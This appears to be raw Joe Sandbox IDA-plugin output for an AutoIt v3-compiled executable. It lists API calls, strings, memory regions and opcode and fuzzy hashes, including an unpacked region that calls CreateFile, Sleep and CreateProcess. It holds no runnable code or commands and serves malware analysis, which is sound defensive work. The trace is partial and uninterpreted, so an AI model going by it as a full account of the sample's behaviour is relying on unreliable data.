                    • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                    • API String ID: 2673923337-2727554177
                    • Opcode ID: 42930e491e983040162462c77046826318d3fdeda96d9b6d789038c2f84b90c3
                    • Instruction ID: 9a5b40c41ad0cc3d9bfdad762d7d3fdde8a08d67068b0d5a62ba10dc35a6bf4b
                    • Opcode Fuzzy Hash: 42930e491e983040162462c77046826318d3fdeda96d9b6d789038c2f84b90c3
                    • Instruction Fuzzy Hash: 0571AFB54093059EC724EF65EC819ABB7E8FF45340F44452EF459C32A0DB709948DBA6

                    Control-flow Graph

                    APIs
                    • GetSysColorBrush.USER32(0000000F), ref: 00C73A62
                    • LoadCursorW.USER32(00000000,00007F00), ref: 00C73A71
                    • LoadIconW.USER32(00000063), ref: 00C73A88
                    • LoadIconW.USER32(000000A4), ref: 00C73A9A
                    • LoadIconW.USER32(000000A2), ref: 00C73AAC
                    • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00C73AD2
                    • RegisterClassExW.USER32(?), ref: 00C73B28
                      • Part of subcall function 00C73041: GetSysColorBrush.USER32(0000000F), ref: 00C73074
                      • Part of subcall function 00C73041: RegisterClassExW.USER32(00000030), ref: 00C7309E
                      • Part of subcall function 00C73041: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00C730AF
                      • Part of subcall function 00C73041: LoadIconW.USER32(000000A9), ref: 00C730F2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Load$Icon$Register$BrushClassColor$ClipboardCursorFormatImage
                    • String ID: #$0$AutoIt v3
                    • API String ID: 2880975755-4155596026
                    • Opcode ID: 5a4fb9e2896ee30c675d2e3dc44e31ccb7f090433c37ca11a522b4b73954819a
                    • Instruction ID: f20817129216d0e36c344cbc90db08e028792fefc2dc77292d10d07bf457e728
                    • Opcode Fuzzy Hash: 5a4fb9e2896ee30c675d2e3dc44e31ccb7f090433c37ca11a522b4b73954819a
                    • Instruction Fuzzy Hash: 7C214D74900308BFDB109FA4EC49B9E7BB4FB08710F11812AF504E63A1D7B69654DF69

                    Control-flow Graph

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                    • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                    • API String ID: 1825951767-3513169116
                    • Opcode ID: 829bbb9099120a452586e06c3ca7d82f015aa186fa59b36a1816ce6a834d5c14
                    • Instruction ID: 20ba7b3589dc82d8c95bfc21bc5f26fc274947825d09a0b79ace789d958cf647
                    • Opcode Fuzzy Hash: 829bbb9099120a452586e06c3ca7d82f015aa186fa59b36a1816ce6a834d5c14
                    • Instruction Fuzzy Hash: A9A1607681025DABDF04EBA0CC95EEEB778FF14300F048429F51AA7191DF749A09EB61

                    Control-flow Graph

                    APIs
                    • GetSysColorBrush.USER32(0000000F), ref: 00C73074
                    • RegisterClassExW.USER32(00000030), ref: 00C7309E
                    • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00C730AF
                    • LoadIconW.USER32(000000A9), ref: 00C730F2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Register$BrushClassClipboardColorFormatIconLoad
                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                    • API String ID: 975902462-1005189915
                    • Opcode ID: a8123871e4e69d943f7cce23d8d65e2497b86531c7b7f28eecbc18c3fadf45ab
                    • Instruction ID: d20120029e578b9f8e3b4a56ba9c5a5ddcb0e6338ee66e774367af48841e9790
                    • Opcode Fuzzy Hash: a8123871e4e69d943f7cce23d8d65e2497b86531c7b7f28eecbc18c3fadf45ab
                    • Instruction Fuzzy Hash: 423106B1941309AFDB409FA4DC85B9DBBF0FF09310F10852EE550E62A0D7B54586CF61

                    Control-flow Graph

                    APIs
                    • GetSysColorBrush.USER32(0000000F), ref: 00C73074
                    • RegisterClassExW.USER32(00000030), ref: 00C7309E
                    • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00C730AF
                    • LoadIconW.USER32(000000A9), ref: 00C730F2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Register$BrushClassClipboardColorFormatIconLoad
                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                    • API String ID: 975902462-1005189915
                    • Opcode ID: 53e59a620f30b47c4155d968b7cf7833b7eb8a9ba7d4ed377252040435e8e1e7
                    • Instruction ID: 1367c034c96fe5f1d23693fb2f78b97b7071e95db7dd44e47c7d9123a5774ff3
                    • Opcode Fuzzy Hash: 53e59a620f30b47c4155d968b7cf7833b7eb8a9ba7d4ed377252040435e8e1e7
                    • Instruction Fuzzy Hash: 8D21A5B5900318AFDB009F94E889B9DBBF4FB08700F10812AEA10E63A0D7B14545CFA5

                    Control-flow Graph

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID:
                    • String ID: NULL Pointer assignment$Not an Object type
                    • API String ID: 0-572801152
                    • Opcode ID: 1cfaf3662d1849b3c269836db9c9c6c6c2d9beb4d4dc477eb35583409d970ed6
                    • Instruction ID: 94b777a3bcde19e85be4f3b854acf56e6f975bf6975c8e8e5e3e71a1c0d9ed4f
                    • Opcode Fuzzy Hash: 1cfaf3662d1849b3c269836db9c9c6c6c2d9beb4d4dc477eb35583409d970ed6
                    • Instruction Fuzzy Hash: FDC19F71A0025A9FDF10CFAAC885BAEB7B5FF48314F148469E915EB280E770AE45CB51

                    Control-flow Graph

                    APIs
                    • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 03140965
                    Memory Dump Source
                    • Source File: 00000000.00000002.2027121117.0000000003140000.00000040.00001000.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3140000_jv4ri.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                    • Instruction ID: 5f84f2acf5c1d7864bc1c61ae1417c0c02583a4e2260b5f332257ee8e2d05eb5
                    • Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                    • Instruction Fuzzy Hash: 2951F675A50208FBEF24DFA5CC49FEEB7B9AF4C700F208554F64AEA180DB7496458B60

                    Control-flow Graph

                    APIs
                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00C73A15
                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00C73A36
                    • ShowWindow.USER32(00000000,?,?), ref: 00C73A4A
                    • ShowWindow.USER32(00000000,?,?), ref: 00C73A53
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Window$CreateShow
                    • String ID: AutoIt v3$edit
                    • API String ID: 1584632944-3779509399
                    • Opcode ID: cfd4a91888ca35d1faec2bdef8b6de3fa4f5f05a43fe165c9be6ea3941400eea
                    • Instruction ID: 652d77e350e9cf0a62eeb1a0a15cf815b6e3974d28f26aa92b65a3b98a318582
                    • Opcode Fuzzy Hash: cfd4a91888ca35d1faec2bdef8b6de3fa4f5f05a43fe165c9be6ea3941400eea
                    • Instruction Fuzzy Hash: 05F03A746003947EEA701727AC08F7B3E7DDBC7F50B02802EBA00E2270CAA55811DAB5

                    Control-flow Graph

                    APIs
                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00CAD5EC
                      • Part of subcall function 00C77D2C: _memmove.LIBCMT ref: 00C77D66
                    • _memset.LIBCMT ref: 00C7418D
                    • _wcscpy.LIBCMT ref: 00C741E1
                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00C741F1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                    • String ID: Line:
                    • API String ID: 3942752672-1585850449
                    • Opcode ID: 2c55c01869e686b05001a8c9060c3ae8a0a41c70b73f7bfe6f9c21c49838eda5
                    • Instruction ID: b35b59015bcd02587eef21b9ba169aea528d43cd548ff3a690aa138cd24a7e65
                    • Opcode Fuzzy Hash: 2c55c01869e686b05001a8c9060c3ae8a0a41c70b73f7bfe6f9c21c49838eda5
                    • Instruction Fuzzy Hash: A731D171408318AFD725EB60DC46BEF77E8AF44300F10C61EF199921A1EB74A648D7A7
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                    • String ID:
                    • API String ID: 1559183368-0
                    • Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                    • Instruction ID: 348404629486ce957af025398ea6d2d156c52602c58be2e0c5c62175a0000313
                    • Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                    • Instruction Fuzzy Hash: F551A030A10B05DFDF268FB9C88866EB7B5AF41320F648769F835962D0D7719F519B40
                    APIs
                      • Part of subcall function 00C74F3D: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00D362F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00C74F6F
                    • _free.LIBCMT ref: 00CAE68C
                    • _free.LIBCMT ref: 00CAE6D3
                      • Part of subcall function 00C76BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00C76D0D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: _free$CurrentDirectoryLibraryLoad
                    • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                    • API String ID: 2861923089-1757145024
                    • Opcode ID: 4191987339c9ae8b04bd908825a59cf3c26c7a2c0f902c497b3371cd96824d05
                    • Instruction ID: f2406ccf1c98cf0e6c1eb420eeb536e3f88133472d1d1c98571baa2b1eb59947
                    • Opcode Fuzzy Hash: 4191987339c9ae8b04bd908825a59cf3c26c7a2c0f902c497b3371cd96824d05
                    • Instruction Fuzzy Hash: 5F91707191021AEFCF04EFA4CC919EDB7B4FF19314F14856AF815AB291EB309A05DBA0
                    APIs
                      • Part of subcall function 031422A0: Sleep.KERNELBASE(000001F4), ref: 031422B1
                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 031424FE
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2027121117.0000000003140000.00000040.00001000.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3140000_jv4ri.jbxd
                    Similarity
                    • API ID: CreateFileSleep
                    • String ID: NE75JB4M9EWG69JLI1A96IVQ8
                    • API String ID: 2694422964-3911713287
                    • Opcode ID: bbdb60a202c4c42b7c660eda079f274f5ba94c0617fa5ad5a2b5f1dd0ee09130
                    • Instruction ID: 9f05a580a0f7e66e7d7c693f0ae673e2847b183f7d35a1201a235a44572918d6
                    • Opcode Fuzzy Hash: bbdb60a202c4c42b7c660eda079f274f5ba94c0617fa5ad5a2b5f1dd0ee09130
                    • Instruction Fuzzy Hash: E9618230D04288DBEF11DBA4D814BEEBB78AF19304F044599E6487B2C1D7B91B8ACB65
                    APIs
                    • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00CCDAFB
                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00CCDB0C
                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00CCDB8E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: ErrorMode$AddressProc
                    • String ID: DllGetClassObject
                    • API String ID: 1548245697-1075368562
                    • Opcode ID: 6475efb4c079ce2a9c59c7efa319f379d358234ff32843eb8e6181b0d48a4fdd
                    • Instruction ID: 497e93e9fded3a8b6e18544dd1eee11b611ee82cf88564f01e33c55289776b96
                    • Opcode Fuzzy Hash: 6475efb4c079ce2a9c59c7efa319f379d358234ff32843eb8e6181b0d48a4fdd
                    • Instruction Fuzzy Hash: B1414CB1600208EFDB15CF55C898FAABBB9EF44350F1580AEE9069F245D7B1DE44DBA0
                    APIs
                    • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00C735A1,SwapMouseButtons,00000004,?), ref: 00C735D4
                    • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00C735A1,SwapMouseButtons,00000004,?,?,?,?,00C72754), ref: 00C735F5
                    • RegCloseKey.KERNELBASE(00000000,?,?,00C735A1,SwapMouseButtons,00000004,?,?,?,?,00C72754), ref: 00C73617
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: CloseOpenQueryValue
                    • String ID: Control Panel\Mouse
                    • API String ID: 3677997916-824357125
                    • Opcode ID: ec6090c10f0d84a5e89ea4dbd658f741e0843a6541a3d5cfee9b9ba06b399b3c
                    • Instruction ID: 0d89d9ddb4cfba0e038b402f4a6f95fe37176f824459c1840c379c50f559c6c9
                    • Opcode Fuzzy Hash: ec6090c10f0d84a5e89ea4dbd658f741e0843a6541a3d5cfee9b9ba06b399b3c
                    • Instruction Fuzzy Hash: 03113371611258BBDB208F64D880AEEBBA8EF04740F118469B809D7210E6719F41ABA4
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: eaafd6bed695371e08c2d474aad4914c528258768f7b5acefeac003b491253e4
                    • Instruction ID: de75bfb652422c991e1e5e4ce8b2dcfda32e0d9257b669c0950987dacff2ee1a
                    • Opcode Fuzzy Hash: eaafd6bed695371e08c2d474aad4914c528258768f7b5acefeac003b491253e4
                    • Instruction Fuzzy Hash: 14C13974A04216EFCB15CF95C888EAEBBB5FF48714B11869CE816EB251D730DE81DB90
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                    • String ID:
                    • API String ID: 2782032738-0
                    • Opcode ID: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                    • Instruction ID: d4fdb90e489f344a1e4bd8aa745b43cd6eb3fc2efc2fdbb5f22475e078afced6
                    • Opcode Fuzzy Hash: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                    • Instruction Fuzzy Hash: 1741D871A007069BDF2CCEA9C888D6F77AAEF84360B24817DE865C7640EB70DE439744
                    APIs
                    • _memset.LIBCMT ref: 00CAEE62
                    • 7516D0D0.COMDLG32(?), ref: 00CAEEAC
                      • Part of subcall function 00C748AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C748A1,?,?,00C737C0,?), ref: 00C748CE
                      • Part of subcall function 00C909D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00C909F4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: NamePath$7516FullLong_memset
                    • String ID: X
                    • API String ID: 3926756254-3081909835
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: __fread_nolock_memmove
                    • String ID: EA06
                    • API String ID: 1988441806-3962188686
                    APIs
                      • Part of subcall function 00C9594C: __FF_MSGBANNER.LIBCMT ref: 00C95963
                      • Part of subcall function 00C9594C: __NMSG_WRITE.LIBCMT ref: 00C9596A
                      • Part of subcall function 00C9594C: RtlAllocateHeap.NTDLL(00870000,00000000,00000001), ref: 00C9598F
                    • std::exception::exception.LIBCMT ref: 00C9102C
                    • __CxxThrowException@8.LIBCMT ref: 00C91041
                      • Part of subcall function 00C987DB: RaiseException.KERNEL32(?,?,00000000,00D2BAF8,?,00000001,?,?,?,00C91046,00000000,00D2BAF8,00C79FEC,00000001), ref: 00C98830
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                    • String ID: bad allocation
                    • API String ID: 3902256705-2104205924
                    APIs
                    • CreateProcessW.KERNELBASE(?,00000000), ref: 03141045
                    • ExitProcess.KERNEL32(00000000), ref: 03141064
                    Memory Dump Source
                    • Source File: 00000000.00000002.2027121117.0000000003140000.00000040.00001000.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3140000_jv4ri.jbxd
                    Similarity
                    • API ID: Process$CreateExit
                    • String ID: D
                    • API String ID: 126409537-2746444292
                    APIs
                    • GetTempPathW.KERNEL32(00000104,?), ref: 00CD9B82
                    • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00CD9B99
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Temp$FileNamePath
                    • String ID: aut
                    • API String ID: 3285503233-3010740371
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    APIs
                    • CoInitialize.OLE32(00000000), ref: 00CE83D8
                    • VariantInit.OLEAUT32(?), ref: 00CE83EE
                    • VariantClear.OLEAUT32(?), ref: 00CE86BF
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Variant$ClearInitInitialize
                    • String ID:
                    • API String ID: 4200086340-0
                    APIs
                      • Part of subcall function 00C903A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00C903D3
